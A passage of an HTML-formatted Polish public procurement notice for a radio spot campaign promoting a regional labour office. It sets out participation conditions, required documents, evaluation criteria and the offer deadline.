utrwalenie na nośnikach elektronicznych wykorzystywanych w dystrybucji bezpośredniej (m.in. płyty CD/DVD, pamięć USB).Wykonawca, który zlecać będzie wykonanie części zamówienia (np. opracowanie kluczy kodowych) Podwykonawcom na podstawie umowy w formie pisemnej o charakterze odpłatnym (art. 2 ust. 9a Pzp) zobowiązany jest do wykazania tego w pkt 13 Formularza ofertowego stanowiącego załącznik do niniejszej SIWZ dotyczącego Podwykonawcy.</span> <br/> <br/> <b>II.5) Główny kod CPV: </b> <span id="ctl00_ContentPlaceHolder1_cpv_glowny_przedmiot">92200000-3</span> <br/> <b> Dodatkowe kody CPV:</b> <br/> <br /> <br /> <b> II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>: <br/> Wartość bez VAT: <span id="ctl00_ContentPlaceHolder1_szacunkowa_wartosc_zamowienia_calosc"></span> <br/> Waluta: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_waluta_calosc"></span> <br/> <i>(w przypadku umów ramowych lub dynamicznego systemu zakupów – szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i> </div> <br/> <b> II.7) Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: </b> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67">Nie</span> <br/> Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67_tekst"></span> <br/> <b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b> <br /> miesiącach:&#160; <span id="ctl00_ContentPlaceHolder1_okres_w_miesiacach"></span> &#160;<i> lub </i> <b> dniach:</b> <span id="ctl00_ContentPlaceHolder1_okres_w_dniach"></span> <br /> <i>lub</i> <br /> <b> data rozpoczęcia: </b> <span id="ctl00_ContentPlaceHolder1_data_rozpoczecia"></span> &#160;<i> lub </i><b> zakończenia: </b> <span id="ctl00_ContentPlaceHolder1_data_zakonczenia"></span> <br /> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Okres w miesiącach</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Okres w dniach</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Data rozpoczęcia</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Data zakończenia</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'></TD><TD style='border: 1px solid black;border-collapse: collapse;'></TD><TD style='border: 1px solid black;border-collapse: collapse;'> </TD><TD style='border: 1px solid black;border-collapse: collapse;'>2020-12-18</TD></TR></TABLE> <br/> <b>II.9) Informacje dodatkowe: </b> <span id="ctl00_ContentPlaceHolder1_informacje_na_temat_katalogow"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b> III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU </b> <br/> <div style="padding-left: 20px"> <b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_okreslenie_warunkow">Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_okreslenie_warunkow"></span> <br/> <b>III.1.2) Sytuacja finansowa lub ekonomiczna </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_okreslenie_warunkow">Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_informacje_dodatkowe"></span> <br/> <b>III.1.3) Zdolność techniczna lub zawodowa </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_okreslenie_warunkow">Zamawiający uzna spełnienie w/w warunku, jeżeli Wykonawca: 1) Wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie wykonał, a w przypadku świadczeń okresowych lub ciągłych wykonuje należycie: Dla części I co najmniej 1 usługę polegającą na realizacji promocyjnej/reklamowej radiowej kampanii spotowej o wartości co najmniej 17 600,00 zł brutto;Dla części II co najmniej 1 usługę polegającą na realizacji promocyjnej/reklamowej radiowej kampanii spotowej o wartości co najmniej 25 120,00 zł brutto. Opis sposobu dokonywania oceny spełnienia tego warunku:Zamawiający dokona oceny spełnienia w/w warunku według formuły „spełnia/nie spełnia” na podstawie wykazu zawierającego usługę wykonaną w okresie ostatnich trzech lat przed upływem terminu składania ofert bądź wykonywaną nadal, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadającej w/w przedmiotowi zamówienia, z podaniem:- przedmiotu kampanii, - nazwy zleceniodawcy, na rzecz którego usługa została wykonana, - terminu realizacji,- wartości zamówienia dot. promocyjnej/reklamowej radiowej kampanii spotowej wraz z załączeniem dokumentu lub dokumentów potwierdzających, że usługa wymieniona w wykazie została wykonana lub jest wykonywana należycie (np. referencje). W przypadku świadczeń okresowych lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające jej należyte wykonywanie powinny być wydane nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.Faktura VAT (jako dokument potwierdzający należyte wykonanie usługi) wystawiona przez Wykonawcę w ramach danej usługi wskazanej w wykazie usług zrealizowanych, nie będzie brana pod uwagę przez Zamawiającego. Sam dokument faktury, bez żadnych dodatkowych informacji na temat należytego wykonania, nie może ze swej istoty tego faktu potwierdzać. Z tego dokumentu nie wynika chociażby, że zamówienie zostało wykonane w terminie, a na Wykonawcę nie nałożono kar umownych czy potrąceń.Dokumenty potwierdzające należyte wykonanie powinny zostać przedstawione w formie oryginału lub czytelnej kserokopii poświadczonej „za zgodność z oryginałem” przez Wykonawcę lub osobę upoważnioną do występowania w imieniu Wykonawcy.Nie wykazanie spełnienia w/w warunku skutkować będzie wykluczeniem Wykonawcy z postępowania zgodnie z art. 24 ust. 1 pkt 12 ustawy Pzp.</span> <br/> Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób: <span id="ctl00_ContentPlaceHolder1_czy_zdolnosc_techniczna_wymaga_wykonawcow">Nie</span> <br/> Informacje dodatkowe: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_informacje_dodatkowe"></span> </div> <b> III.2) PODSTAWY WYKLUCZENIA </b> <br/> <div style="padding-left: 20px"> <b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1 ustawy Pzp</b> <br/> <b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b> <span id="ctl00_ContentPlaceHolder1_czy_zamawiajacy_przewiduje_wykluczenie">Tak</span> Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia: <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_1">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_2">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 2 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_3">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 3 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_4">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 4 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_5">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 5 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_6">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 6 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_7">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 7 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_8">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 8 ustawy Pzp)</span> <br/> </div> <b> III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI </b> <br/> <div style="padding-left: 20px"> <b> Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_niepodleganiu_wykluczenia">Tak</span> <br/> <b> Oświadczenie o spełnianiu kryteriów selekcji </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_spelnienie_kryteriow">Nie</span> </div> <b> III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP: </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_dokumentow_zaswiadczen">odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 24 ust. 5 pkt. 1 ustawy Pzp. </span> </div> <b> III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_warunkow_udzialu"> wykaz usług wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, w okresie ostatnich 3 lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane, oraz załączeniem dowodów określających czy te usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego usługi były wykonywane, a w przypadku świadczeń okresowych lub ciągłych są wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać tych dokumentów – oświadczenie Wykonawcy; w przypadku świadczeń okresowych lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wydane nie wcześniej niż 3 miesiące przed upływem terminu składania ofert – wg Załącznika do SIWZ Nr 5.I dla części I/ Nr 5.II dla części II; </span> <br/> <b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_kryteriow_selekcji"></span> </div> <b> III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_potwierdzenie_okolicznosci">w terminie 3 dni od zamieszczenia na stronie internetowej Zamawiającego informacji z otwarcia ofert, o której mowa w ust. 6 w Rozdziale XIV niniejszej SIWZ: - oświadczenie o przynależności lub braku przynależności do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 1 pkt 23 ustawy. W przypadku składania ofert dla obu części, przedmiotowe oświadczenie należy złożyć dla każdej z nich. Wraz ze złożeniem oświadczenia, Wykonawca może przedstawić dowody, że powiązania z innym Wykonawcą nie prowadzą do zakłócenia konkurencji w postępowaniu o udzielenie zamówienia. W przypadku Wykonawców wspólnie składających ofertę, przedmiotowe oświadczenie zobowiązany jest złożyć każdy z Wykonawców wspólnie składających ofertę. Wzór w/w oświadczenie będzie stanowić załącznik do Informacji z otwarcia ofert, która zostanie zamieszczona na stronie internetowej Zamawiającego. </span> </div> <b> III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6) </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_inne_dokumenty_niewymienione"></span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA IV: PROCEDURA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>IV.1) OPIS </b> <br/> <b>IV.1.1) Tryb udzielenia zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_tryb_udzielenia_zamowienia">Przetarg nieograniczony</span> <br/> <b>IV.1.2) Zamawiający żąda wniesienia wadium:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wadium">Nie</span> <br/> Informacja na temat wadium <br/> <span id="ctl00_ContentPlaceHolder1_wadium"></span> </div> <br/> <b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zaliczek">Nie</span> <br/> Należy podać informacje na temat udzielania zaliczek: <br/> <span id="ctl00_ContentPlaceHolder1_przewiduje_udzielenie_zaliczek"></span> </div> <br/> <b> IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_zlozenie_katalogow_elektronicznych_informacje_dodatkowe"></span> </div> <br/> <b> IV.1.5.) Wymaga się złożenia oferty wariantowej: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_oferty_wariantowej">Nie</span> <br/> Dopuszcza się złożenie oferty wariantowej <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej"></span> <br/> Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej_zasadniczej"></span> </div> <br/> <b> IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu </b> <br/> <i> (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne) </i> <div style="padding-left: 20px"> Liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_liczba_wykonawcow"></span> <br/> Przewidywana minimalna liczba wykonawców <span id="ctl00_ContentPlaceHolder1_minimalna_liczba_wykonawcow"></span> <br/> Maksymalna liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_wykonawcow"></span> <br/> Kryteria selekcji wykonawców: <br/> <span id="ctl00_ContentPlaceHolder1_znaczenie_warunkow_wykonawcow"></span> </div> <br/> <b> IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów: </b> <div style="padding-left: 20px"> Umowa ramowa będzie zawarta: <br/> <span id="ctl00_ContentPlaceHolder1_z_kim_umowa_bedzie_zawarta"></span> <br/> Czy przewiduje się ograniczenie liczby uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_ograniczenie_liczby_uczestnikow"></span> <br/> Przewidziana maksymalna liczba uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow_informacje_dodatkowe"></span> <br/> Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_obejmuje_ustanowienie"></span> <br/> Adres strony internetowej, na której będą zamieszczone dodatkowe informacje dotyczące dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie_informacje_dodatkowe"></span> <br/> W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_umowy_ramowej_dynamicznego_katalogow"></span> <br/> Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_pobranie_umowy_ramowej_dynamicznego_katalogow"></span> </div> <br/> <b>IV.1.8) Aukcja elektroniczna </b> <br/> <b> Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i> <span id="ctl00_ContentPlaceHolder1_aukcja_elektroniczna">Nie</span> <br/> Należy podać adres strony internetowej, na której aukcja będzie prowadzona: <br/> <span id="ctl00_ContentPlaceHolder1_adres_strony_na_ktorej_bedzie_prowadzona"></span> <br/> <b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b> <span id="ctl00_ContentPlaceHolder1_elementy_aukcji_elektronicznej"></span> <br/> <b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b> <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenia_do_przedstawianych_wartosci"></span> <br/> Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie termin ich udostępnienia: <span id="ctl00_ContentPlaceHolder1_informaje_udostepnione_wykonawcom"></span> <br/> Informacje dotyczące przebiegu aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_informaje_przebiegu_aukcji"></span> <br/> Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): <span id="ctl00_ContentPlaceHolder1_warunki_do_licytacji"></span> <br/> Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń: <span id="ctl00_ContentPlaceHolder1_wykorzystanie_sprzetu_elektronicznego"></span> <br/> Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_wymagania_dotyczace_rejestracji_wyk_aukcja"></span> <br/> Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa"></span> <br/>Czas trwania: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa_czas"></span> <br /> <br/> Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_wykonawcy_zakwalfikowani"></span> <br/> Warunki zamknięcia aukcji elektronicznej: <br/> <span id="ctl00_ContentPlaceHolder1_warunki_zamkniecia_aukcji"></span> </div> <br/> <b>IV.2) KRYTERIA OCENY OFERT </b> <br/> <b>IV.2.1) Kryteria oceny ofert: </b> <br/> <b>IV.2.2) Kryteria</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kryteria</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Znaczenie</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Cena</TD><TD style='border: 1px solid black;border-collapse: collapse;'>60,00</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Czas emisji - liczba emisji w godzinach premium</TD><TD style='border: 1px solid black;border-collapse: collapse;'>40,00</TD></TR></TABLE> <br/> <b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony) <br/> <span id="ctl00_ContentPlaceHolder1_zastosowanie_procedury_pzp">Tak</span> <br/> <b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b> <br/> <b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b> <br/> Minimalne wymagania, które muszą spełniać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_minimalne_wymagania"></span> <br/> Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziane_jest_zastrzezenie"></span> <br/> Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert: <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziany_podzial"></span> <br/> Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów): <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_etapy_negocjacji"></span> <br/> Informacje dodatkowe <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_dodatkowe_informacje"></span> <br/> <br/> <b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b> <br/> Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_opis_potrzeb"></span> <br/> Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_informacja_wysokosc_nagrod"></span> <br/> Wstępny harmonogram postępowania: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_wstepny_harmonogram"></span> <br/> Podział dialogu na etapy w celu ograniczenia liczby rozwiązań: <span id="ctl00_ContentPlaceHolder1_IV_3_2_PodzialDialogu"></span> <br/> Należy podać informacje na temat etapów dialogu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_EtapyDialogu"></span> <br/> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_DodatkoweInformacje"></span> <br/> <b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b> <br/> Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_ElementyOpisu"></span> <br/> Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_PodzialNegocjacji"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_DodatkoweInfo"></span> <br/> <b>IV.4) Licytacja elektroniczna </b> <br/> Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_6"></span> </div> Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_7"></span> </div> Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_8"></span> </div> Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_9"></span> </div> Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa"></span> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa_czas"> Czas trwania: </span> <br /> <br/> Wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_4_10_wykonawcy_zakwalfikowani"></span> </div> Termin składania wniosków o dopuszczenie do udziału w licytacji elektronicznej: <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_11_data"></span> godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_11_godzina"></span> <br/> Termin otwarcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_12"></span> </div> Termin i warunki zamknięcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_13"></span> </div> <br/> Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_IstotnePostanowienia"></span> </div> <br/> Wymagania dotyczące zabezpieczenia należytego wykonania umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_14"></span> </div> <br/> Informacje dodatkowe: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_LicytacjeDodatkoweInformacje"></span> </div> <b>IV.5) ZMIANA UMOWY</b> <br/> <b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy">Nie</span> <br/> Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian: <br/> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy_tekst"></span> <br/> <b>IV.6) INFORMACJE ADMINISTRACYJNE </b> <br/> <br /> <b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i> <br /> <span id="ctl00_ContentPlaceHolder1_IV_6_1_sposob_udostepniania"></span> <br/> <b>Środki służące ochronie informacji o charakterze poufnym</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_1_srodki_ochrony"></span> <br/> <b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b> <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_4_data">2020-10-15</span>, godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_4_godzina">11:00</span>, <br/> Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem): <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_SkrocenieTerminu">Nie</span> <br/> Wskazać powody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_Powody"></span> <br/> Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu <br/>> <span id="ctl00_ContentPlaceHolder1_IV_4_4_jezyki">język polski</span> <br/> <b>IV.6.3) Termin związania ofertą: </b> do: <span id="ctl00_ContentPlaceHolder1_IV_4_5_data"></span> okres w dniach: <span id="ctl00_ContentPlaceHolder1_IV_4_5_okres">30</span> (od ostatecznego terminu składania ofert) <br/> <b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków, które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b> <span id="ctl00_ContentPlaceHolder1_IV_4_17">Nie</span> <br/> <b>IV.6.5) Informacje dodatkowe:</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_6"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: center"> <u> ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH </u> </div> <br /> <div> <br /> <table><tr><td><b>Część nr: </b></td><td>1</td><td><b>Nazwa: </b></td><td>Kampania spotowa PO WER</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Kampania spotowa PO WERPrzedmiot zamówienia obejmuje przygotowanie i realizację kampanii radiowej promującej działania Wojewódzkiego Urzędu Pracy w 